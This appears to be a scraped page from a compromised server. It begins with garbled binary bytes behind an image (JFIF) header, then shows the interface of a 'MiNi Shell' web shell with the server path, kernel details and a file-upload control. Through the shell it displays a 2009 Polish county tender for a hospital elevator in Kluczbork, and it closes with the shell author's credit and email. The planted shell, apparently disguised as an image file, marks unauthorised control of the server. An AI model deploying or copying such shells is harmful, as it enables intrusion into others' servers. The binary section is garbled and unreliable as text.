JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090407/95956-N-2009.html

<p class="kh_header"><b>Kluczbork: Opracowanie dokumentacji, dostawa z wykonaniem montażu i uruchomienie dźwigu szpitalnego w budynku Szpitala Powiatowego w Kluczborku Stara Chirurgia</b><br>
<b>Numer ogłoszenia: 95956 - 2009; data zamieszczenia: 07.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Kluczborski , ul. Katowicka 1, 46-200 Kluczbork, woj. opolskie, tel. 0-77 4185218, faks 0-77 4186520.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatkluczborski.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> NIE DOTYCZY</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji, dostawa z wykonaniem montażu i uruchomienie dźwigu szpitalnego w budynku Szpitala Powiatowego w Kluczborku Stara Chirurgia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: jednorazowe opracowanie dokumentacji, dostawa z wykonaniem  montażu i uruchomienie dźwigu szpitalnego w budynku Szpitala Powiatowego w Kluczborku Stara Chirurgia oraz obsługa tego dźwigu w celu utrzymania sprawności technicznej w okresie minimum 48 miesięcznej gwarancji.
W zakres zamówienia wchodzi w szczególności:
1)Wykonanie pełnej dokumentacji konstrukcji samonośnej stalowej dźwigu, przy wykorzystaniu istniejącego fundamentu, wraz z dostawą i montażem tej konstrukcji.
2)Wykonanie projektu, dostawy i montażu kompletnego dźwigu hydraulicznego;
3)Wykonanie zasilania elektrycznego od tablicy rozdzielczej stosownie do zainstalowanej mocy i niezbędnej instalacji elektrycznej w tym oświetlenia szybu dźwigu;
4)Sporządzenie i przekazanie dokumentacji powykonawczej dźwigu służbom eksploatacyjnym wskazanym przez Zamawiającego;
5)Dostarczenie stosownych - wynikających z obowiązujących przepisów - certyfikatów, badań do uzyskania pozwolenia na użytkowanie;
6)Odbiór dźwigu przez Urząd Dozoru Technicznego i uzyskanie decyzji na jego eksploatację (opłacenie kosztów odbioru i rejestracji dźwigów);
7)Utrzymywanie dźwigu w okresie udzielonej gwarancji we właściwej i stałej sprawności technicznej zgodnie z postanowieniami Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 29 października 2003 r. w sprawie warunków technicznych dozoru technicznego w zakresie eksploatacji niektórych urządzeń transportu bliskiego, na podstawie ustawy z dnia 21 grudnia 2000 r. o Dozorze Technicznym (Dz. U. Nr 122, poz. 1321 z późn. zm.), w tym m.in.:
a)Wykonywanie przeglądów konserwacyjnych podstawowych, (co 30 dni), których zasadniczym celem jest sprawdzenie działania urządzeń dźwigu pod kątem bezpieczeństwa użytkowania, zgodnie z obowiązującymi w tej mierze normami. W tym Wykonawca jest obowiązany do: 
- sporządzenia raportu z przeprowadzonego przeglądu z podaniem zespołów, które wymagają remontu.
- przekazania raportu Zamawiającemu w terminie 7 dni od daty sporządzenia.
- dokonania wpisu do dziennika dźwigu.
Przegląd należy wykonywać, co 30 dni, rozpoczynając odliczanie od daty protokołu odbioru robót.
b)Wykonywanie przeglądów rocznych, tj. kompleksowych przeglądów konserwacyjnych, których celem, poza sprawami bezpieczeństwa użytkowników oraz sprawdzeniu konstrukcji nośnej dźwigu jest gruntowna obsługa techniczna wszystkich jego urządzeń, zgodnie z obowiązującym i tej mierze normami.
PRZEGLĄD ROCZNY należy wykonywać w terminie 12, 24, 36, 48 itd. miesięcy od przeglądu podstawowego.
W tym zakresie Wykonawca jest zobowiązany do:
- Sporządzenia raportu z przeprowadzonego przeglądu z podaniem zespołów, które wymagają remontu.
- Przekazania raportu Zamawiającemu w terminie 7 dni od daty sporządzenia.
- Dokonania wpisu do dziennika dźwigu.
c)Prowadzenie wymaganej przepisami, pełnej dokumentacji technicznej przeglądów i konserwacji oraz wykonywanie pomiarów okresowych.
8)Prowadzenie całodobowego pogotowia dźwigowego we wszystkie dni tygodnia i w jego zakresie stawianie się na wezwanie telefoniczne Zamawiającego, w ciągu maksymalnie 6 godzin od otrzymania zgłoszenia telefonicznego
a)wykonywanie w ramach przeglądów, w tym wymienionych w pkt. 8, wszelkich czynności wynikających z warunków gwarancji oraz usuwanie na bieżąco awarii, usterek i innych nieprawidłowości w działaniu dźwigu, w tym również zgłaszanych telefonicznie.
b)wykonywanie napraw dźwigów wykraczających poza wyżej wymieniony zakres, będących następstwem niewłaściwego użytkowania, dewastacji i innych zdarzeń z winy użytkowników, co będzie zlecane każdorazowo przez Zamawiającego na podstawie przepisów ustawy Prawo zamówień publicznych odrębną umową.

Szczegółowy opis - charakterystyka techniczna dźwigu, zakres i wielkość przedmiotu zamówienia został zawarty w formularzu zestawienie parametrów technicznych stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.31.31.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości  6 000,00 zł (sześć tysięcy złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie  zamówienia  mogą  ubiegać  się  Wykonawcy, którzy:
a)  spełniają warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych;
b) zrealizowali z należytą starannością w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dostawę dźwigu szpitalnego wraz z wykonaniem instalacji i uruchomieniem dźwigu o wartości co najmniej 300 000 zł brutto. Zrealizowana dostawa musi być potwierdzona dokumentem od zleceniodawcy o należytym jej wykonaniu;
c) udzielą minimum 48 miesięcznej gwarancji na wszystkie elementy i podzespoły dźwigu oraz minimum 48 miesięczną gwarancję na wszystkie wbudowane materiały budowlane i wykonane roboty budowlane licząc od daty protokolarnego odbioru końcowego dokonanego przez Urząd Dozoru Technicznego, a następnie Zamawiającego - Komisję Odbioru Technicznego i przedstawiciela Wykonawcy;
d) posiadają polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej   działalności gospodarczej na kwotę nie mniejszą niż kwota w ofercie oraz zobowiąże się do odnowienia ubezpieczenia na cały okres realizacji zamówienia, jeżeli polisa nie obejmuje tego okresu;
Opis sposobu dokonywania oceny spełniania wyżej wymienionych warunków:
Ad. a) Zamawiający uzna, iż warunek ten został spełniony, w przypadku gdy Wykonawca przedstawi wraz z ofertą oświadczenie (wyłącznie według wzoru Zamawiającego) w trybie art. 22 ustawy Prawo zamówień Publicznych wraz z dokumentami określonymi w specyfikacji istotnych warunków zamówienia i składanymi na potwierdzenie spełniania warunków określonych w złożonym oświadczeniu,
Ad. b) Zamawiający uzna, iż warunek ten został spełniony w przypadku gdy Wykonawca przedstawi wraz z ofertą wykaz dostaw wykonanych w ciągu ostatnich trzech lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zawierający co najmniej jedną dostawę dźwigu szpitalnego wraz z wykonaniem instalacji i uruchomieniem dźwigu o wartości co najmniej 300 000 zł brutto. Zrealizowana dostawa musi być potwierdzona dokumentem od zleceniodawcy o należytym jej wykonaniu.
Ad. c) Zamawiający uzna, iż warunek ten został spełniony, w przypadku gdy Wykonawca złoży Zamawiającemu ofertę według wzoru Zamawiającego zawierającą oświadczenie o udzieleniu minimum 48 miesięcznej gwarancji na wszystkie elementy i podzespoły dźwigu oraz minimum 48 miesięczną gwarancję na wszystkie wbudowane materiały budowlane i wykonane roboty budowlane licząc od daty protokolarnego odbioru końcowego dokonanego przez Urząd Dozoru Technicznego, a następnie Zamawiającego - Komisję Odbioru Technicznego i przedstawiciela Wykonawcy.
Ad d) Zamawiający uzna, iż warunek ten został spełniony, w przypadku gdy Wykonawca złoży Zamawiającemu wraz z ofertą polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości nie mniejszej niż kwota w ofercie oraz zobowiąże się do odnowienia ubezpieczenia na cały okres realizacji zamówienia, jeżeli polisa nie obejmuje tego okresu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta  musi zawierać:
a) wypełniony i podpisany formularz ofertowy (wyłącznie według wzoru Zamawiającego jako zał. Nr 1),
b) Zestawienie parametrów oferowanego dźwigu (jako zał. Nr 2)
c) oświadczenie o spełnianiu warunków z art. 22 Prawa  zamówień publicznych (wyłącznie według wzoru Zamawiającego jako zał. Nr 3),
d) aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
e) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu. Zaświadczenie winno być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
f) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu. Zaświadczenie winno być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
g) wykaz dostaw wykonanych w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zawierający co najmniej jedną dostawę dźwigu szpitalnego wraz z wykonaniem instalacji i uruchomieniem dźwigu o wartości co najmniej 300 000 zł brutto. Zrealizowana dostawa musi być potwierdzona dokumentem od zleceniodawcy o należytym jej wykonaniu (jako zał. Nr 4),
h) dokument potwierdzający, że dostawa ujęta w wykazie, o którym mowa w lit. f została wykonana należycie.
i) oświadczenie o udzieleniu minimum 48 miesięcznej gwarancji na wszystkie elementy i podzespoły dźwigu oraz minimum 48 miesięczną gwarancję na wszystkie wbudowane materiały budowlane i wykonane roboty budowlane licząc od daty protokolarnego odbioru końcowego dokonanego przez Urząd Dozoru Technicznego, a następnie Zamawiającego - Komisję Odbioru Technicznego i przedstawiciela Wykonawcy  oraz warunki gwarancji i serwisu pogwarancyjnego (jako zał. Nr 5).
Dokumenty bezwzględnie wymagane, gdy kilku Wykonawców wspólnie ubiegają się o udzielenie zamówienia.
W przypadku kiedy kilku Wykonawców wspólnie ubiegają się o udzielenie zamówienia do oferty należy załączyć:
a) dokumenty wymienione w punkcie VIII  lit. c- e składa każdy Wykonawca,
b) pisemne ustanowienie pełnomocnika do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia w trakcie postępowania i do zawarcia umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Termin gwarancji ( przy założeniu minimum 48 mies.) - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiatkluczborski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe ul. Katowicka 1, 46-200 Kluczbork.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 09:30, miejsce: Starostwo Powiatowe ul. Katowicka 1, 46-200 Kluczbork
pok. 211 (Sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com